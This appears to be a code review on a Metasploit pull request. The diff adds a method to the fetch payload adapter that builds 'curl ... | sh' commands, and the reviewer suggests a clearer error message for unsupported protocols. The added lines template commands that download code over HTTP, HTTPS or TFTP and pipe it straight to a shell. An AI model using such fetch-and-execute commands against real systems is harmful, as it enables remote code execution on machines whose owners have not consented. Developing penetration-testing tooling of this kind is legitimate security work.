lib/msf/core/payload/adapter/fetch.rb

```diff
@@ -281,6 +313,19 @@ def _generate_curl_command
     _execute_add(get_file_cmd)
   end
 
+  def _generate_curl_pipe
+    case fetch_protocol
+    when 'HTTP'
+      return "curl -s http://#{_download_pipe} | sh"
+    when 'HTTPS'
+      return "curl -sk https://#{_download_pipe} | sh"
+    when 'TFTP'
+      return "curl -s tftp://#{_download_pipe} | sh"
+    else
+      fail_with(Msf::Module::Failure::BadConfig, 'Unsupported Binary Selected')
```

Comment:
Seems like this should be:
```suggestion
      fail_with(Msf::Module::Failure::BadConfig, "Unsupported protocol: #{fetch_protocol.inspect}")
```

Mostly because you're not matching on the binary here but rather the protocol.